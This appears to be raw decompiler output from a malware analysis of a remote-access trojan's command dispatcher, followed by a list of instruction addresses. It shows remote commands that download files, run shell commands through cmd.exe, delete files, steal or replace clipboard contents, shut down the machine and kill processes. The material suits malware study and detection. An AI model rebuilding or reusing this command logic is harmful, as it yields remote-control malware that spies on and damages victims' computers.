				void* _t273;
				char* _t285;
				intOrPtr _t401;
				intOrPtr _t402;
				short _t403;
				short _t405;
				short _t406;
				short _t407;
				short _t409;
				short _t411;
				short _t414;
				short _t415;
				void* _t418;
				signed int _t419;
				signed int _t420;
				signed int _t423;
				void* _t426;
				void* _t427;
				void* _t428;
				void* _t442;

				_t441 = __eflags;
				_t382 = __edx;
				_push(_t273);
				_t401 = _a4;
				E004020E6(_t273,  &_v308, __edx, __eflags, _t401 + 0x1c);
				SetEvent( *(_t401 + 0x34));
				_t402 =  *((intOrPtr*)(E00401F2E( &_v312)));
				E00401F0C( &_v312,  &_v288, 4, 0xffffffff);
				_t426 = (_t423 & 0xfffffff8) - 0x18c;
				E004020E6(_t273, _t426, _t382, _t441, 0x46103c);
				_t427 = _t426 - 0x18;
				E004020E6(_t273, _t427, _t382, _t441,  &_v304);
				E00411260( &_v444, _t382);
				_t428 = _t427 + 0x30;
				_t442 = _t402 - 0x18;
				if(_t442 > 0) {
					__eflags = _t402 - 0x8f;
					if(__eflags > 0) {
						__eflags = _t402 - 0x98;
						if(__eflags > 0) {
							_t403 = _t402 - 0xa3;
							__eflags = _t403;
							if(_t403 == 0) {
								E0041070B(_t382);
								L111:
								_t285 =  &_v420;
								L112:
								E004031CC(_t285);
								E00401F97();
								E00401F97();
								return 0;
							}
							_t405 = _t403 - 9;
							__eflags = _t405;
							if(_t405 == 0) {
								__eflags =  *0x460a94;
								if( *0x460a94 != 0) {
									ShowWindow( *0x460e24, 9);
									SetForegroundWindow( *0x460e24);
								} else {
									E00412729(_t273, 1, _t382);
									CreateThread(0, 0, E004124F8, 0, 0, 0);
									 *0x460a94 = 2;
								}
								goto L111;
							}
							_t406 = _t405 - 1;
							__eflags = _t406;
							if(__eflags == 0) {
								_push(5);
								L16:
								_push(0);
								L17:
								ShowWindow(E00432099(_t165, E00401F2E(E004031A1( &_v420, _t382, __eflags))), ??);
								goto L111;
							}
							_t407 = _t406 - 1;
							__eflags = _t407;
							if(__eflags == 0) {
								_push(0);
								_push(0);
								goto L17;
							}
							_t408 = _t407 - 4;
							__eflags = _t407 - 4;
							if(__eflags == 0) {
								E00405365( &_v116);
								E004020E6(_t273, _t428 - 0x18, _t382, __eflags, E004031A1( &_v420, _t382, __eflags, 2));
								E004020E6(_t273, _t428, _t382, __eflags, E004031A1( &_v428, _t382, __eflags, 1));
								E004020E6(_t273, _t428 - 0xffffffffffffffe8, _t382, __eflags, E004031A1( &_v436, _t382, __eflags, _t408));
								E00403DC6( &_v140, _t382);
								L00405373(_t273,  &_v212, _t408);
							}
							goto L111;
						}
						if(__eflags == 0) {
							E004020E6(_t273, _t428 - 0x18, _t382, __eflags, E004031A1( &_v420, _t382, __eflags, 0));
							E00404942(_t382);
							L98:
							goto L111;
						}
						_t409 = _t402 - 0x90;
						__eflags = _t409;
						if(__eflags == 0) {
							E00406AA3(E00432099(_t181, E00401F2E(E004031A1( &_v420, _t382, __eflags, 0))));
							goto L111;
						}
						_t411 = _t409;
						__eflags = _t411;
						if(__eflags == 0) {
							_t187 = StrToIntA(E00401F2E(E004031A1( &_v420, _t382, __eflags, 0)));
							E00411BB3( &_v408, 0x30, E00401F2E(E004031A1( &_v424, _t382, __eflags, 1)));
							_t191 = L00404090( &_v408);
							E004020E6(_t273, _t428 - 0x18, 0x30, __eflags, E004031A1( &_v428, 0x30, __eflags, 2));
							E0041172B(_t191);
							E00411A6A(_t187, L00404090( &_v416));
							L94:
							L95:
							E004031D1();
							goto L111;
						}
						_t414 = _t411;
						__eflags = _t414;
						if(__eflags == 0) {
							_t199 = E00401F2E(E004031A1( &_v420, _t382, __eflags, 1));
							SetWindowTextW(E00432099(_t200, E00401F2E(E004031A1( &_v424, _t382, __eflags, 0))), _t199);
							L20:
							E0040E350(_t382);
							goto L111;
						}
						_t415 = _t414 - 1;
						__eflags = _t415;
						if(__eflags == 0) {
							E004020E6(_t273, _t428 - 0x18, _t382, __eflags, E004031A1( &_v420, _t382, __eflags, 0));
							E0040DF90(_t273, _t382);
							goto L98;
						}
						_t417 = _t415;
						__eflags = _t415;
						if(__eflags != 0) {
							goto L111;
						}
						E004020E6(_t273, _t428 - 0x18, _t382, __eflags, E004031A1( &_v420, _t382, __eflags, _t417));
						E0040E0BE(_t428 - 0x18, __eflags);
						goto L98;
					}
					if(__eflags == 0) {
						E0040DF7F( &_v116);
						_v372 = E00432099(_t212, E00401F2E(E004031A1( &_v420, _t382, __eflags, 2)));
						_v368 =  &_v120;
						E0040E3FA(_t273, _t382, 0x46103c, __eflags,  &_v372);
						_t112 = E00406B7A() - 1; // -1
						_t418 = _t112;
						_t219 = E004031A1( &_v428, _t382, __eflags, 3);
						E004020E6(_t273, _t428 - 0x18, _t382, __eflags, _t219);
						E004020E6(_t273, _t428, _t382, __eflags, E004031A1( &_v436, _t382, __eflags, 2));
						E004031DB(_t273, _t428 - 0xffffffffffffffe8, E00401F2E(E004031A1( &_v444, _t382, __eflags, 1)));
						E004031DB(_t273, _t428 - 0xffffffffffffffd0, E00401F2E(E004031A1( &_v452, _t382, __eflags, 0)));
						E00406317( &_v156, _t382, __eflags);
						__eflags = _v252;
						if(_v252 == 0) {
							E00406B27( &_v444,  *((intOrPtr*)(E00406B06(E00406B8E( &_v156,  &_v504),  &_v500, _t418))));
						}
						E00406AFE(_t273,  &_v212, _t418);
						goto L111;
					}
					_t419 = _t402 + 0xffffffe0;
					__eflags = _t419 - 0x14;
					if(__eflags > 0) {
						goto L111;
					}
					switch( *((intOrPtr*)(_t419 * 4 +  &M0040DF2B))) {
						case 0:
							DeleteFileW(E00401F2E(E004031A1( &_v420, _t382, __eflags, 0)));
							goto L111;
						case 1:
							ExitProcess(0);
						case 2:
							while(1) {
								__eflags =  *0x460a97 - __bl;
								if( *0x460a97 == __bl) {
									break;
								}
								Sleep(0x64);
							}
							E00407CBF();
							goto L112;
						case 3:
							__eax = E00408289(__ebx, __eflags);
							goto L111;
						case 4:
							while(1) {
								__eflags =  *0x460a97 - __bl;
								if(__eflags == 0) {
									break;
								}
								Sleep(0x64);
							}
							__ebx = 0;
							__ecx =  &_v420;
							__ecx = E004031A1( &_v420, __edx, __eflags, 0);
							__eax = E00401F2E(__eax);
							__ecx =  &_v424;
							__esi = __eax;
							__ecx = E004031A1( &_v424, __edx, __eflags, 1);
							__eax = E00401F2E(__eax);
							__ecx =  &_v408;
							__eax = E00411BB3( &_v408, __edx, __eax);
							_push(0);
							_push(0);
							__ecx =  &_v408;
							_push(L00404090( &_v408));
							__ecx =  &_v428;
							__ecx = E004031A1( &_v428, __edx, __eflags, 2);
							__eax = E00401F2E(__ecx);
							_push(__eax);
							_push(0);
							__imp__URLDownloadToFileW();
							__eflags = __eax;
							if(__eflags != 0) {
								goto L94;
							}
							goto L45;
						case 5:
							while(1) {
								__eflags =  *0x460a97 - __bl;
								if(__eflags == 0) {
									break;
								}
								Sleep(0x64);
							}
							__ecx =  &_v420;
							__ecx = E004031A1( &_v420, __edx, __eflags, 0);
							__eax = E00401F2E(__eax);
							__ecx =  &_v424;
							__esi = __eax;
							__ecx = E004031A1( &_v424, __edx, __eflags, 1);
							__eax = E00401F2E(__eax);
							__ecx =  &_v408;
							__eax = E00411BB3( &_v408, __edx, __eax);
							__ecx =  &_v408;
							__eax = L00404090( &_v408);
							__ecx =  &_v428;
							__esi = __eax;
							__eax = E004031A1( &_v428, __edx, __eflags, 2);
							__esp = __esp - 0x18;
							__ecx = __esp;
							__eax = E004020E6(__ebx, __esp, __edx, __eflags, __eax);
							__ecx = __esi;
							__eax = E0041172B(__ecx);
							__esp = __esp + 0x18;
							__eflags = __al;
							if(__eflags == 0) {
								goto L94;
							}
							L45:
							__esp = __esp - 0x18;
							__eax =  &_v420;
							__ecx = __esp;
							E00405481(__ebx, __esp, __edx, __eflags,  &_v420) = E00407F80(__eflags);
							__esp = __esp + 0x18;
							goto L94;
						case 6:
							__ecx =  &_v420;
							__ecx = E004031A1( &_v420, __edx, __eflags, 2);
							__eax = E00401F2E(__ecx);
							__eax =  &(__eax[0x8000]);
							__ecx =  &_v424;
							__ecx = E004031A1( &_v424, __edx, __eflags, 1);
							__eax = E00401F2E(__eax);
							__ebx = 0;
							__ecx =  &_v428;
							__ecx = E004031A1( &_v428, __edx, __eflags, 0);
							E00401F2E(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
							goto L111;
						case 7:
							__eax = E0040E39F();
							__ebx = 0;
							__ecx =  &_v420;
							__eax = E004031A1( &_v420, __edx, __eflags, 0);
							__edx = "0";
							__ecx = __eax;
							__eax = E00403C62(__edx);
							__ecx =  &_v424;
							_push(0);
							__eflags = __al;
							if(__eflags == 0) {
								__eax = E004031A1( &_v424, __edx, __eflags);
								__edx = "1";
								__ecx = __eax;
								__eax = E00403C62(__edx);
								__ecx =  &_v424;
								_push(0);
								__eflags = __al;
								if(__eflags == 0) {
									__eax = E004031A1( &_v424, __edx, __eflags);
									__edx = "2";
									__ecx = __eax;
									__eax = E00403C62(__edx);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = LoadLibraryA("PowrProf.dll");
										__eax = GetProcAddress(__eax, "SetSuspendState");
										__ecx =  &_v420;
										__esi = __eax;
										__eax = E004031A1( &_v420, __edx, __eflags, 0);
										__edx = "3";
										__ecx = __eax;
										__eax = E00403C62(__edx);
										_push(0);
										__eflags = __al;
										if(__eflags == 0) {
											__ecx =  &_v420;
											__eax = E004031A1( &_v420, __edx, __eflags);
											__edx = "4";
											__ecx = __eax;
											__eax = E00403C62("4");
											__eflags = __al;
											if(__al == 0) {
												goto L111;
											}
											_push(0);
											_push(0);
											_push(1);
											L62:
											__eax =  *__esi();
											goto L111;
										}
										_push(0);
										_push(0);
										goto L62;
									}
									_push(0);
									__ecx =  &_v420;
									__ecx = E004031A1( &_v420, __edx, __eflags, 1);
									__eax = E00401F2E(__ecx);
									__eax = E00432099(__ecx, __eax);
									__eax = __eax | 0x00000002;
									__eflags = __eax;
									L57:
									_pop(__ecx);
									__eax = ExitWindowsEx(__eax, ??);
									goto L111;
								}
								__ecx = E004031A1( &_v424, __edx, __eflags, 1);
								__eax = E00401F2E(__ecx);
								__eax = E00432099(__ecx, __eax);
								__eax = __eax | 0x00000001;
								goto L57;
							}
							__ecx = E004031A1( &_v424, __edx, __eflags, 1);
							__eax = E00401F2E(__ecx);
							__eax = E00432099(__ecx, __eax);
							goto L57;
						case 8:
							L68:
							__eax = OpenClipboard(__ebx);
							__eflags = __eax;
							if(__eax == 0) {
								goto L111;
							}
							__esi = GetClipboardData(0xd);
							__edi = GlobalLock(__esi);
							GlobalUnlock(__esi) = CloseClipboard();
							__eflags = __edi;
							0x45595c =  !=  ? __edi : 0x45595c;
							__ecx =  &_v400;
							__eax = E004031DB(__ebx,  &_v400,  !=  ? __edi : 0x45595c);
							__esp = __esp - 0x18;
							__edx =  &_v404;
							__ecx = __esp;
							__eax = E004111F2(__ebx, __esp, __edx);
							_push(0x6b);
							__ecx = 0x4613f8;
							__eax = E00401790(__ebx, 0x4613f8, __edx, __eflags);
							goto L94;
						case 9:
							__eflags = OpenClipboard(0);
							if(__eflags == 0) {
								goto L111;
							}
							__eax = EmptyClipboard();
							__ecx =  &_v420;
							__ecx = E004031A1( &_v420, __edx, __eflags, 0);
							__eax = E00401F26();
							__eax =  &(__eax[1]);
							__edi = __eax;
							__eax = GlobalLock(__edi);
							__ecx =  &_v424;
							__esi = __eax;
							__ecx = E004031A1( &_v424, __edx, __eflags, 0);
							__eax = E00401F26();
							__ecx =  &_v428;
							__ecx = E004031A1( &_v428, __edx, __eflags, 0);
							GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
							goto L67;
						case 0xa:
							__eax = OpenClipboard(0);
							__eflags = __eax;
							if(__eax == 0) {
								goto L111;
							}
							__eax = EmptyClipboard();
							L67:
							__eax = CloseClipboard();
							goto L68;
						case 0xb:
							__ecx =  &_v420;
							__ecx = E004031A1( &_v420, __edx, __eflags, 0);
							__ecx = __eax;
							__eax = E00407275(__ecx);
							goto L111;
						case 0xc:
							__eax =  &_v404;
							__ebx = 0;
							__ecx =  &_v420;
							_v404 = 0;
							_v408 = 0;
							__ecx = E004031A1( &_v420, __edx, __eflags, 0);
							__eax = E00401F2E(__eax);
							__edx =  &_v412;
							__ecx = __eax;
							__eax = E00410F67(__eax,  &_v412,  &_v404);
							__eflags = __eax - 1;
							if(__eax != 1) {
								goto L111;
							}
							__ecx = _v408;
							E00407275(_v408) = L00430AAB(_v408);
							L26:
							_pop(__ecx);
							goto L111;
						case 0xd:
							__eax = E00407B75(__edx);
							goto L111;
						case 0xe:
							__ecx =  &_v420;
							__eax = E004031A1( &_v420, __edx, __eflags, 0);
							__esp = __esp - 0x18;
							__ecx = __esp;
							__eax = E0040E723(__edx);
							goto L98;
						case 0xf:
							__ecx =  &_v420;
							__eax = E004031A1( &_v420, __edx, __eflags, 0);
							__esp = __esp - 0x18;
							__ecx = __esp;
							__eax = E0040C5F8(__edx);
							goto L98;
						case 0x10:
							__ecx =  &_v420;
							__eax = E004031A1( &_v420, __edx, __eflags, 0);
							__esp = __esp - 0x18;
							__ecx = __esp;
							__eax = E00402F51(__edx);
							goto L98;
						case 0x11:
							_push(__ecx);
							__esi = 0x461258;
							__ecx = 0x461258;
							__eax = E00401F26();
							__ecx = 0x461258;
							__eax = E00401F2E(0x461258);
							__ebx = 0;
							__ecx =  &_v420;
							__ecx = E004031A1( &_v420, __edx, __eflags, 0);
							E00401F26() =  &(__eax[0]);
							__ecx =  &_v424;
							__ecx = E004031A1( &_v424, __edx, __eflags, 0);
							__eax = E00401F2E(__eax);
							__ecx = 0x461210;
							__edx = E00401F2E(0x461210);
							__eax = E0040BAFF(__eax, __eflags, 0x461210, __eax, __eax, __eax, __eax);
							goto L98;
						case 0x12:
							__ecx =  &_v420;
							__eax = E004031A1( &_v420, __edx, __eflags, 0);
							__esp = __esp - 0x18;
							__ecx = __esp;
							__eax = E0040B519(__edx);
							goto L98;
						case 0x13:
							goto L111;
						case 0x14:
							__ecx =  &_v420;
							__eax = E004031A1( &_v420, __edx, __eflags, 0);
							__esp = __esp - 0x18;
							__ecx = __esp;
							__eax = E0040FB2D(__edx);
							goto L98;
					}
				}
				if(_t442 == 0) {
					__eflags =  *0x460a86;
					if( *0x460a86 == 0) {
						E00407B2B();
					}
					goto L111;
				}
				_t420 = _t402 - 1;
				if(_t420 > 0x10) {
					goto L111;
				}
				switch( *((intOrPtr*)(_t420 * 4 +  &M0040DEE7))) {
					case 0:
						_t242 = E0041107C(_t273,  &_v360, GetTickCount());
						_t244 = E0041107C(_t273,  &_v332, E0041102C( &_v360));
						_t246 = E004111F2(_t273,  &_v164, E00410FF2( &_v140));
						_t393 = E00404095(0,  &_v404, E00405870( &_v264, E00404095(0,  &_v240, E00405870( &_v216, E004040B9( &_v192, E004031A1( &_v420, _t245, _t443, 0)),  &_v164), _t443, _t246), 0x46103c), _t443, _t244);
						E00405870(_t428 - 0x18, _t252, 0x46103c);
						E00401790(0, 0x4613f8, _t252, _t443, 0x4c, _t242);
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E004031D1();
						E00401F97();
						E00401F97();
						_t266 = E00432099(_t264, E00401F2E(E004031A1( &_v452, _t252, _t443, 1)));
						if(_t266 == 0) {
							E004031A1( &_v440, _t393, __eflags, 0);
							_t268 = E00403C62("0");
							__eflags = _t268;
							if(_t268 == 0) {
								goto L111;
							}
							_push(0);
							_t380 = 0x4613f8;
							goto L10;
						} else {
							_t395 = _t266 + _t266;
							if(E00401536(0x4613f8) == 0) {
								E00401B86(0x4613f8, _t395, 1);
							} else {
								E00401C99(_t395);
							}
							goto L111;
						}
					case 1:
						_push(0);
						__ecx = 0x4613f8;
						L10:
						E00401E07(_t380);
						goto L111;
					case 2:
						__ecx =  &_v360;
						__eax = E0041175F(__ebx,  &_v360);
						__esp = __esp - 0x18;
						__edx = __eax;
						__ecx = __esp;
						__eax = E004111F2(__ebx, __esp, __edx);
						_push(0x33);
						__ecx = 0x4613f8;
						__eax = E00401790(__ebx, 0x4613f8, __edx, __eflags);
						__ecx =  &_v388;
						goto L95;
					case 3:
						goto L111;
					case 4:
						 &_v376 = GetCurrentProcessId();
						__eax = E004331FF(__ecx, __eax,  &_v376, 0xa);
						__esp = __esp - 0xc;
						__eax =  &_v376;
						__esi = __esp;
						__ecx =  &_v332;
						__edx = E00409973(__ebx,  &_v332, __eflags);
						__ecx =  &_v360;
						__edx = __eax;
						__ecx = __esi;
						__eax = E00402973(__ebx, __esi, __edx, __eflags,  &_v376);
						_push(0x4f);
						__ecx = 0x4613f8;
						__eax = E00401790(__ebx, 0x4613f8, __edx, __eflags);
						__ecx =  &_v388;
						__eax = E00401F97();
						__ecx =  &_v360;
						__eax = E00401F97();
						goto L111;
					case 5:
						__ecx =  &_v420;
						__ecx = E004031A1( &_v420, __edx, __eflags, 0);
						__eax = E00401F2E(__ecx);
						__ecx = __eax;
						__eax = E0041104F(__ecx);
						goto L111;
					case 6:
						goto L20;
					case 7:
						__ecx =  &_v420;
						__ecx = E004031A1( &_v420, __edx, __eflags, 0);
						__eax = E00401F2E(__ecx);
						__eax = CloseWindow(__eax);
						goto L111;
					case 8:
						_push(3);
						goto L16;
					case 9:
						_push(9);
						goto L16;
					case 0xa:
						__eax =  &_v372;
						__ecx =  &_v420;
						__ecx = E004031A1( &_v420, __edx, __eflags, 0);
						__eax = E00401F2E(__ecx);
						__eax = GetWindowThreadProcessId(__eax,  &_v372);
						__ecx = _v376;
						__eax = E0041104F(_v376);
						goto L20;
					case 0xb:
						__ebx = 0;
						__ecx =  &_v420;
						__ecx = E004031A1( &_v420, __edx, __eflags, 0);
						__eax = E00401F2E(__eax);
						__ecx =  &_v336;
						__eax = E004031DB(0,  &_v336, __eax);
						__edx = L"/C ";
						__ecx =  &_v368;
						__ecx = __eax;
						__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
						__ecx =  &_v368;
						__eax = E004031D1();
						__ecx =  &_v340;
						goto L95;
					case 0xc:
						__ecx =  &_v420;
						__eax = E004031A1( &_v420, __edx, __eflags, 1);
						__ecx = 0x4610e0;
						__eax = E00401F7D(0x4610e0, __eax);
						__eflags =  *0x460a84;
						if(__eflags != 0) {
							goto L111;
						}
						__ecx =  &_v420;
						__eax = E004031A1( &_v420, __edx, __eflags, 0);
						__esp = __esp - 0x18;
						__ecx = __esp;
						__eax = E004037DD();
						goto L98;
					case 0xd:
						__ebx = 0;
						__ecx =  &_v420;
						__ecx = E004031A1( &_v420, __edx, __eflags, 0);
						E00401F2E(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
						goto L111;
					case 0xe:
						__ecx =  &_v420;
						__eax = E004031A1( &_v420, __edx, __eflags, 0);
						__ecx = 0x4614e0;
						__eax = E00401F7D(0x4614e0, __eax);
						__ecx =  &_v428;
						__ecx = E004031A1( &_v428, __edx, __eflags, 3);
						__eax = E00401F2E(__ecx);
						__esi = __eax;
						__eax = E0040ECDB(__edx, __edi, __eax);
						__ecx =  &_v432;
						__ecx = E004031A1( &_v432, __edx, __eflags, 2);
						__eax = E00401F2E(__ecx);
						__eax = E00432099(__ecx, __eax);
						__eflags = __eax;
						__ecx =  &_v436;
						_t59 = __eax != 0;
						__eflags = _t59;
						__ebx = __ebx & 0xffffff00 | _t59;
						__ecx = E004031A1( &_v436, __edx, _t59, 1);
						E00401F2E(__ecx) = E00432099(__ecx, __eax);
						__eax = E0040ED58(__ecx, __edx, __eflags, __esi);
						goto L26;
					case 0xf:
						 *0x460cd9 = 1;
						__eax =  &(__eax[0x23066c]);
						__ecx = __ecx + __ebp;
						asm("fisttp qword [eax]");
						 *__eax =  *__eax + __al;
						__eflags =  *__eax;
						goto L111;
				}
			}














































































                                            0x0040d14f
                                            0x0040d14f
                                            0x0040d15f
                                            0x0040d161
                                            0x0040d169
                                            0x0040d171
                                            0x0040d18e
                                            0x0040d198
                                            0x0040d19d
                                            0x0040d1a8
                                            0x0040d1ad
                                            0x0040d1ba
                                            0x0040d1c3
                                            0x0040d1c8
                                            0x0040d1cb
                                            0x0040d1ce
                                            0x0040d61f
                                            0x0040d621
                                            0x0040dc4e
                                            0x0040dc50
                                            0x0040ddcb
                                            0x0040ddcb
                                            0x0040ddd1
                                            0x0040deb1
                                            0x0040deb6
                                            0x0040deb6
                                            0x0040deba
                                            0x0040deba
                                            0x0040dec6
                                            0x0040ded2
                                            0x0040dedf
                                            0x0040dedf
                                            0x0040ddd7
                                            0x0040ddd7
                                            0x0040ddda
                                            0x0040de6a
                                            0x0040de71
                                            0x0040de9d
                                            0x0040dea9
                                            0x0040de73
                                            0x0040de75
                                            0x0040de86
                                            0x0040de8c
                                            0x0040de8c
                                            0x00000000
                                            0x0040de71
                                            0x0040dde0
                                            0x0040dde0
                                            0x0040dde3
                                            0x0040de63
                                            0x0040d429
                                            0x0040d429
                                            0x0040d42b
                                            0x0040d443
                                            0x00000000
                                            0x0040d443
                                            0x0040dde5
                                            0x0040dde5
                                            0x0040dde8
                                            0x0040de5c
                                            0x0040de5d
                                            0x00000000
                                            0x0040de5d
                                            0x0040ddea
                                            0x0040ddea
                                            0x0040dded
                                            0x0040ddfa
                                            0x0040de10
                                            0x0040de26
                                            0x0040de3b
                                            0x0040de47
                                            0x0040de53
                                            0x0040de53
                                            0x00000000
                                            0x0040dded
                                            0x0040dc56
                                            0x0040ddb9
                                            0x0040ddbe
                                            0x0040ddc3
                                            0x00000000
                                            0x0040ddc3
                                            0x0040dc5c
                                            0x0040dc5c
                                            0x0040dc62
                                            0x0040dd9e
                                            0x00000000
                                            0x0040dd9e
                                            0x0040dc69
                                            0x0040dc69
                                            0x0040dc6c
                                            0x0040dd11
                                            0x0040dd32
                                            0x0040dd3c
                                            0x0040dd54
                                            0x0040dd5b
                                            0x0040dd70
                                            0x0040dd75
                                            0x0040dd79
                                            0x0040dd79
                                            0x00000000
                                            0x0040dd79
                                            0x0040dc73
                                            0x0040dc73
                                            0x0040dc76
                                            0x0040dcd3
                                            0x0040dcf3
                                            0x0040d480
                                            0x0040d480
                                            0x00000000
                                            0x0040d480
                                            0x0040dc78
                                            0x0040dc78
                                            0x0040dc7b
                                            0x0040dcb7
                                            0x0040dcbc
                                            0x00000000
                                            0x0040dcbc
                                            0x0040dc7e
                                            0x0040dc7e
                                            0x0040dc81
                                            0x00000000
                                            0x00000000
                                            0x0040dc97
                                            0x0040dc9c
                                            0x00000000
                                            0x0040dc9c
                                            0x0040d627
                                            0x0040db5a
                                            0x0040db77
                                            0x0040db82
                                            0x0040db8c
                                            0x0040db9c
                                            0x0040db9c
                                            0x0040db9f
                                            0x0040dbaa
                                            0x0040dbc0
                                            0x0040dbdd
                                            0x0040dbfa
                                            0x0040dc06
                                            0x0040dc0b
                                            0x0040dc13
                                            0x0040dc33
                                            0x0040dc33
                                            0x0040dc3f
                                            0x00000000
                                            0x0040dc3f
                                            0x0040d62d
                                            0x0040d630
                                            0x0040d633
                                            0x00000000
                                            0x00000000
                                            0x0040d63b
                                            0x00000000
                                            0x0040d655
                                            0x00000000
                                            0x00000000
                                            0x0040d662
                                            0x00000000
                                            0x0040d670
                                            0x0040d670
                                            0x0040d676
                                            0x00000000
                                            0x00000000
                                            0x0040d66a
                                            0x0040d66a
                                            0x0040dee2
                                            0x00000000
                                            0x00000000
                                            0x0040d67d
                                            0x00000000
                                            0x00000000
                                            0x0040d68f
                                            0x0040d68f
                                            0x0040d695
                                            0x00000000
                                            0x00000000
                                            0x0040d689
                                            0x0040d689
                                            0x0040d697
                                            0x0040d699
                                            0x0040d6a3
                                            0x0040d6a5
                                            0x0040d6ac
                                            0x0040d6b0
                                            0x0040d6b7
                                            0x0040d6b9
                                            0x0040d6c0
                                            0x0040d6c5
                                            0x0040d6cb
                                            0x0040d6cc
                                            0x0040d6cd
                                            0x0040d6d6
                                            0x0040d6d9
                                            0x0040d6e2
                                            0x0040d6e4
                                            0x0040d6e9
                                            0x0040d6ea
                                            0x0040d6eb
                                            0x0040d6f1
                                            0x0040d6f3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040d71d
                                            0x0040d71d
                                            0x0040d723
                                            0x00000000
                                            0x00000000
                                            0x0040d717
                                            0x0040d717
                                            0x0040d727
                                            0x0040d730
                                            0x0040d732
                                            0x0040d739
                                            0x0040d73d
                                            0x0040d744
                                            0x0040d746
                                            0x0040d74d
                                            0x0040d752
                                            0x0040d758
                                            0x0040d75c
                                            0x0040d763
                                            0x0040d767
                                            0x0040d769
                                            0x0040d76e
                                            0x0040d771
                                            0x0040d774
                                            0x0040d779
                                            0x0040d77b
                                            0x0040d780
                                            0x0040d783
                                            0x0040d785
                                            0x00000000
                                            0x00000000
                                            0x0040d6f9
                                            0x0040d6f9
                                            0x0040d6fc
                                            0x0040d700
                                            0x0040d708
                                            0x0040d70d
                                            0x00000000
                                            0x00000000
                                            0x0040d792
                                            0x0040d79b
                                            0x0040d79d
                                            0x0040d7a9
                                            0x0040d7ae
                                            0x0040d7ba
                                            0x0040d7bc
                                            0x0040d7c2
                                            0x0040d7c4
                                            0x0040d7ce
                                            0x0040d7d7
                                            0x00000000
                                            0x00000000
                                            0x0040d7e2
                                            0x0040d7e7
                                            0x0040d7e9
                                            0x0040d7ee
                                            0x0040d7f3
                                            0x0040d7f8
                                            0x0040d7fa
                                            0x0040d7ff
                                            0x0040d803
                                            0x0040d804
                                            0x0040d806
                                            0x0040d81e
                                            0x0040d823
                                            0x0040d828
                                            0x0040d82a
                                            0x0040d82f
                                            0x0040d833
                                            0x0040d834
                                            0x0040d836
                                            0x0040d851
                                            0x0040d856
                                            0x0040d85b
                                            0x0040d85d
                                            0x0040d862
                                            0x0040d864
                                            0x0040d899
                                            0x0040d8a0
                                            0x0040d8a7
                                            0x0040d8ab
                                            0x0040d8ad
                                            0x0040d8b2
                                            0x0040d8b7
                                            0x0040d8b9
                                            0x0040d8be
                                            0x0040d8bf
                                            0x0040d8c1
                                            0x0040d8c7
                                            0x0040d8cb
                                            0x0040d8d0
                                            0x0040d8d5
                                            0x0040d8d7
                                            0x0040d8dc
                                            0x0040d8de
                                            0x00000000
                                            0x00000000
                                            0x0040d8e4
                                            0x0040d8e5
                                            0x0040d8e6
                                            0x0040d8e8
                                            0x0040d8e8
                                            0x00000000
                                            0x0040d8e8
                                            0x0040d8c3
                                            0x0040d8c4
                                            0x00000000
                                            0x0040d8c4
                                            0x0040d866
                                            0x0040d869
                                            0x0040d872
                                            0x0040d874
                                            0x0040d87a
                                            0x0040d87f
                                            0x0040d87f
                                            0x0040d882
                                            0x0040d882
                                            0x0040d884
                                            0x00000000
                                            0x0040d884
                                            0x0040d83f
                                            0x0040d841
                                            0x0040d847
                                            0x0040d84c
                                            0x00000000
                                            0x0040d84c
                                            0x0040d80f
                                            0x0040d811
                                            0x0040d817
                                            0x00000000
                                            0x00000000
                                            0x0040d989
                                            0x0040d98a
                                            0x0040d990
                                            0x0040d992
                                            0x00000000
                                            0x00000000
                                            0x0040d9a0
                                            0x0040d9aa
                                            0x0040d9b2
                                            0x0040d9b8
                                            0x0040d9bf
                                            0x0040d9c3
                                            0x0040d9c7
                                            0x0040d9cc
                                            0x0040d9cf
                                            0x0040d9d3
                                            0x0040d9d5
                                            0x0040d9da
                                            0x0040d9dc
                                            0x0040d9e1
                                            0x00000000
                                            0x00000000
                                            0x0040d8f6
                                            0x0040d8f8
                                            0x00000000
                                            0x00000000
                                            0x0040d8fe
                                            0x0040d905
                                            0x0040d90e
                                            0x0040d910
                                            0x0040d915
                                            0x0040d924
                                            0x0040d927
                                            0x0040d92e
                                            0x0040d932
                                            0x0040d939
                                            0x0040d93b
                                            0x0040d942
                                            0x0040d94b
                                            0x0040d966
                                            0x00000000
                                            0x00000000
                                            0x0040d96f
                                            0x0040d975
                                            0x0040d977
                                            0x00000000
                                            0x00000000
                                            0x0040d97d
                                            0x0040d983
                                            0x0040d983
                                            0x00000000
                                            0x00000000
                                            0x0040d9ed
                                            0x0040d9f6
                                            0x0040d9fd
                                            0x0040d9ff
                                            0x00000000
                                            0x00000000
                                            0x0040da09
                                            0x0040da0d
                                            0x0040da11
                                            0x0040da15
                                            0x0040da19
                                            0x0040da22
                                            0x0040da24
                                            0x0040da29
                                            0x0040da2d
                                            0x0040da2f
                                            0x0040da35
                                            0x0040da38
                                            0x00000000
                                            0x00000000
                                            0x0040da3e
                                            0x0040da4b
                                            0x0040d5c7
                                            0x0040d5c7
                                            0x00000000
                                            0x00000000
                                            0x0040da55
                                            0x00000000
                                            0x00000000
                                            0x0040da61
                                            0x0040da65
                                            0x0040da6a
                                            0x0040da6d
                                            0x0040da75
                                            0x00000000
                                            0x00000000
                                            0x0040da81
                                            0x0040da85
                                            0x0040da8a
                                            0x0040da8d
                                            0x0040da95
                                            0x00000000
                                            0x00000000
                                            0x0040daa1
                                            0x0040daa5
                                            0x0040daaa
                                            0x0040daad
                                            0x0040dab5
                                            0x00000000
                                            0x00000000
                                            0x0040dabf
                                            0x0040dac0
                                            0x0040dac5
                                            0x0040dac7
                                            0x0040dacd
                                            0x0040dacf
                                            0x0040dad5
                                            0x0040dad7
                                            0x0040dae1
                                            0x0040dae8
                                            0x0040dae9
                                            0x0040daf4
                                            0x0040daf6
                                            0x0040dafd
                                            0x0040db07
                                            0x0040db09
                                            0x00000000
                                            0x00000000
                                            0x0040db15
                                            0x0040db19
                                            0x0040db1e
                                            0x0040db21
                                            0x0040db29
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040db35
                                            0x0040db39
                                            0x0040db3e
                                            0x0040db41
